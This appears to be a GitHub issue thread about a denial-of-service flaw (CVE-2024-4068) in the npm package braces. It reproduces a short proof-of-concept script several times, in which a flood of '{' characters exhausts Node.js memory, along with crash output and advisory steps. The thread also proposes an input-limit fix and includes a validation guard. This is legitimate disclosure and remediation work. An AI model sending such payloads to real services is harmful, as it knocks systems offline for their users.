Comments (23)
Current code right now will throw from code in the repository:
const braces = require('braces');
const maxRepeats = 1;
for (let repeats = 1; repeats <= maxRepeats; repeats += 1) {
  // 90000 '{' characters: above the 65536-character limit in parse.js, so this throws
  const payload = '{'.repeat(repeats * 90000);
  console.log(`Testing with ${repeats} repeats...`);
  const startTime = Date.now();
  braces(payload);
  const endTime = Date.now();
  const executionTime = endTime - startTime;
  console.log(`Regex executed in ${executionTime / 1000}s.\n`);
}
with:
Testing with 1 repeats...
/Users/coderaiser/braces/lib/parse.js:39
throw new SyntaxError(`Input length (${input.length}), exceeds max characters (${max})`);
^
SyntaxError: Input length (90000), exceeds max characters (65536)
Anyways if we decrease repeats
multiplier to 9000
it will crash node.js:
Regex executed in 1.643s.
Testing with 3 repeats...
<--- Last few GCs --->
[79448:0x128008000] 9091 ms: Scavenge 3643.7 (4107.5) -> 3643.7 (4107.5) MB, pooled: 939 MB, 9.21 / 0.00 ms (average mu = 0.129, current mu = 0.081) allocation failure;
Possible solution, as mentioned by @cichelero, would be to limit the count of unique symbols with an option maxSymbols: 2092bd1#diff-97a844a3a73131d1102031801050b31c823b42a40b8cdcf84b693ebb14463149
In this case we will see:
Testing with 1 repeats...
/Users/coderaiser/braces/lib/validate-input.js:10
throw SyntaxError(`To many symbols '${value}'. Maximum: ${maxSymbols} allowed. Received: ${count}`);
^
SyntaxError: To many symbols '{'. Maximum: 1024 allowed. Received: 9000
at module.exports.validateInput (/Users/coderaiser/braces/lib/validate-input.js:10:15)
at parse (/Users/coderaiser/braces/lib/parse.js:40:3)
It can be overridden with an option according to user needs, but can have reasonable defaults.
from braces.
Same here. Waiting for a solution.
I have the same issue - my builds are being blocked by Blackduck due to this vulnerability.
PoC:
const braces = require('braces');
const maxRepeats = 1;
for (let repeats = 1; repeats <= maxRepeats; repeats += 1) {
  const payload = '{'.repeat(repeats * 90000);
  console.log(`Testing with ${repeats} repeats...`);
  const startTime = Date.now();
  braces(payload);
  const endTime = Date.now();
  const executionTime = endTime - startTime;
  console.log(`Regex executed in ${executionTime / 1000}s.\n`);
}
Some refs:
https://security.snyk.io/vuln/SNYK-JS-BRACES-6838727
https://learn.snyk.io/lesson/redos
That's not enough information to provide a useful response. Please provide a detailed explanation of the vulnerability, and examples of how it would be exploited.
That's fair. But I don't think the information is publicly accessible. Here is the quote from the report:
Technical Description
The flaw occurs in the parse function of the parse.js file. There is no limitation on the number of "imbalanced braces" processed. This allows a crafted input consisting of many { braces to cause the parser to enter a loop and continuously allocate heap memory without freeing any. Eventually a large enough input of these braces will cause an application crash via memory exhaustion.
There is a link to checkmarx. But the link is also gated.
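As an added example (not braces' own code), here is a pre-parse input guard that combines the two checks proposed earlier in this thread (a hard cap on input length and a per-symbol count cap, `maxSymbols`) with a cap on unmatched `{` depth, which is the condition the report above describes as driving the parser's heap growth. The 65536 and 1024 limits are the values visible in the thread's error output; `maxDepth`, `validateBracePattern` and `guardedExpand` are assumed names and values, not part of the library.

```javascript
// Added example, not braces' own code: a guard run before a brace pattern is
// parsed. It mirrors the two checks shown in this thread (a hard cap on input
// length and a cap on how often any single symbol may appear) and adds a cap on
// unmatched '{' depth, since the reported crash comes from imbalanced braces
// accumulating heap allocations in the parser. 65536 and 1024 are the limits
// visible in the thread's error output; maxDepth is an assumed default.
const DEFAULT_LIMITS = { maxLength: 65536, maxSymbols: 1024, maxDepth: 256 };

function validateBracePattern(input, limits = {}) {
  const { maxLength, maxSymbols, maxDepth } = { ...DEFAULT_LIMITS, ...limits };
  if (typeof input !== 'string') throw new TypeError('Expected a string pattern');
  if (input.length > maxLength) {
    throw new SyntaxError(`Input length (${input.length}) exceeds max characters (${maxLength})`);
  }
  const counts = new Map(); // per-symbol occurrence counts
  let depth = 0;            // currently unmatched '{'
  let escaped = false;      // a backslash-escaped brace is a literal, not a group
  for (const ch of input) {
    const n = (counts.get(ch) || 0) + 1;
    counts.set(ch, n);
    if (n > maxSymbols) {
      throw new SyntaxError(`Too many symbols '${ch}'. Maximum: ${maxSymbols} allowed`);
    }
    if (escaped) { escaped = false; continue; }
    if (ch === '\\') { escaped = true; continue; }
    if (ch === '{') depth += 1;
    else if (ch === '}' && depth > 0) depth -= 1;
    if (depth > maxDepth) {
      throw new SyntaxError(`Unbalanced '{' nesting exceeds ${maxDepth}`);
    }
  }
  // The per-symbol cap is coarse (it also rejects long but harmless inputs);
  // the depth cap is the check that targets the reported failure mode.
  return { length: input.length, unmatchedOpen: depth };
}

// Run the guard before handing the pattern to any expansion function (e.g. braces()).
function guardedExpand(expand, input, limits) {
  validateBracePattern(input, limits);
  return expand(input);
}

// Constructed inputs: a normal pattern and the thread's flood of '{'.
function demo() {
  const ok = validateBracePattern('src/{lib,test}/**/*.{js,ts}');
  let rejected = null;
  try { validateBracePattern('{'.repeat(9000)); } catch (e) { rejected = e.message; }
  return { ok, rejected };
}
```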
We'll respond once you or someone else is willing to provide the information I requested above. A link to another source doesn't answer my question.
That said, if you are allowing your users to submit regular expressions in a web form (brace patterns compile to regular expressions as is explained in several places in the readme), and you are using those regular expressions to perform operations on your server, you might have bigger problems than this library.
There is no way to guarantee that users will create safe regular expressions, even if we check "star height". See https://en.wikipedia.org/wiki/Star_height_problem.
https://www.cve.org/CVERecord?id=CVE-2024-4068
https://devhub.checkmarx.com/cve-details/CVE-2024-4068/
@jonschlinkert please find more details+steps (kudos to Mário Teixeira)
Link
Summary
The NPM package micromatch is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in micromatch.braces() in index.js because the pattern .* will greedily match anything, which can cause the application to hang or slow down. This issue should be mitigated by using a safe pattern that won't start backtracking the regular expression due to its greedy matching.
Product
This vulnerability affects all versions of the NPM package micromatch.
Impact
This vulnerability can cause the application to hang or slow down, resulting in a Denial of Service.
Steps To Reproduce
Install micromatch with “npm”:
npm install --save micromatch
Create a poc.js file with the following code:
const { braces } = require('micromatch');
console.log("Executing payloads...");
const maxRepeats = 10;
for (let repeats = 1; repeats <= maxRepeats; repeats += 1) {
  const payload = '{'.repeat(repeats * 90000);
  console.log(`Testing with ${repeats} repeats...`);
  const startTime = Date.now();
  braces(payload);
  const endTime = Date.now();
  const executionTime = endTime - startTime;
  console.log(`Regex executed in ${executionTime / 1000}s.\n`);
}
Execute the proof-of-concept file with node poc.js.
Expected Result:
When executing the proof-of-concept, observe how the response becomes slower on each iteration. If you change the braces { on the payload variable to another character, such as a, the script should execute immediately.
Remediation
A [fix was merged](https://github.com/micromatch/micromatch/commit/81e4d93b2c7a32d290337c0b2a2102e1b584b423) in the pattern matching. However, further testing shows the issue still persists.
Hello all our releases are blocked by this. Can you please help us here @jonschlinkert ?
Same issue
Same issue too
Same issue here as well. Everything is blocked by this issue. Can you please help us, @jonschlinkert ?
Looks like braces is not maintained at all, better to use glob if you use fast-glob, or globby.
braces is used as a transitive dependency of http-proxy-middleware.
Any update on this? I see there are two PRs for fixes out there.
3.0.3 is coming this weekend.
@paulmillr Was 3.0.3 released?
+1 to that. I see the fix is merged but I don't see any new version available in NPM.
Read this #37 (comment)
Sorry, didn't mean to close this, hit enter when I thought it was focused on something else. But I'll keep it locked.
Resolved by #40